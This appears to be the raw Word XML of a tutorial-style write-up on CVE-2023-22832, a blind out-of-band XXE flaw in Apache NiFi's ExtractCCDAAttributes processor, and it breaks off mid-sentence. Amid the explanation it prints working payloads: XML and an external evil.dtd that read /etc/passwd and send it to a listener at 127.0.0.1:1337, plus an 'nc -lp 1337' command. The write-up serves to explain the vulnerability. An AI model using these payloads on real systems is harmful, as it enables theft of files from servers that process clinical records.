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94EB" w14:textId="72954E51" w:rsidR="00DB4183" w:rsidRDefault="00695C4D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache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is a java-based data integration and processing framework that uses data flows to route data based upon its relationship with the processors.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processors provide diverse functionality and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> for data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>maipulation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and generation.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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>has the ability to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> listen on ports, read from files, pull data from the cloud, execute commands as well as act as an http server so there are many ways for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to get data from the internet.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includes many processors, some of which are vulnerable to XML External Entity attacks such as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ExtractCCDAAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> processor. Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> can only be installed on Linux up to versions 1.16, and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ExtractCCDAAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> processor is vulnerable to XXE up to version 1.19.1 and there is no way to use this processor and not be vulnerable. "Clinical documents using the Consolidated Clinical Document Architecture (C-CDA) standards are exchanged billions of times annually in the United States"* and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ExtractCCDAAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> processor is used to extract information from a C-CDA formatted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FlowFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. The vulnerability of this processor is CVE-2023-22832 and can be exploited with a blind XXE attack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">An XXE attack exploits how XML documents parse its document type definitions (DTDs). A DTD can be used to fetch local or remote contents with protocols such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http,ftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,file,etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are three types of XXE attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Inband</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, Error, and Out of Band. An </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Inband</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>invloves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> the output of the XML parsing being shown to the user, an Error XXE is a blind XXE and involves the output being shown in the error logs, and an Out of Band XXE shows no output to the user and is also a blind attack. CVE-2023-22832 is a blind Out of Band XXE vulnerability. This means that we cannot simply submit some XML with an internal DOCTYPE declaration and expect to get any output back. This would look like</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&lt;!DOCTYPE XXE [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]&gt;</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However, with a blind XXE, if we want to exfiltrate the data, we will need to put the data in the URL.</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&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE XXE [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % passwd SYSTEM "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/passwd"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % all "&lt;!ENTITY send SYSTEM '</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1337/?%passwd;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'&gt;"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%all;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt;&amp;send;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt;</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This actually will not work because of an XML constraint that does not allow for internal DTD parameter-entity references, which would be the %passwd in '</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1337/?%passwd;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'. This constraint does not apply to external DTDs. With this in mind we end up with this xml to be submitted to the victim.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB4183">
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>----------xxe.xml--------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE foo SYSTEM "</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8080/evil.dtd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;foo&gt;&amp;send;&lt;/foo&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB4183">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we will have a python http server listening on 8080 in a directory with evil.dtd, as well as `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1337` in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>seperate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64849961" w14:textId="77777777" w:rsidR="00A633B9" w:rsidRDefault="00A633B9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301E93BE" w14:textId="51B54879" w:rsidR="00A633B9" w:rsidRDefault="00DB4183">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6A2D37" wp14:editId="53F9345C">
            <wp:extent cx="4330700" cy="2438332"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="714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6088" cy="2441366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>----------evil.dtd--------------</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file SYSTEM "file:///etc/passwd"&gt;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all "&lt;!ENTITY send SYSTEM '</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00695C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1337/?%file;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'&gt;"&gt;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%all;</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w:t>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>However this still will not work if the contents of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
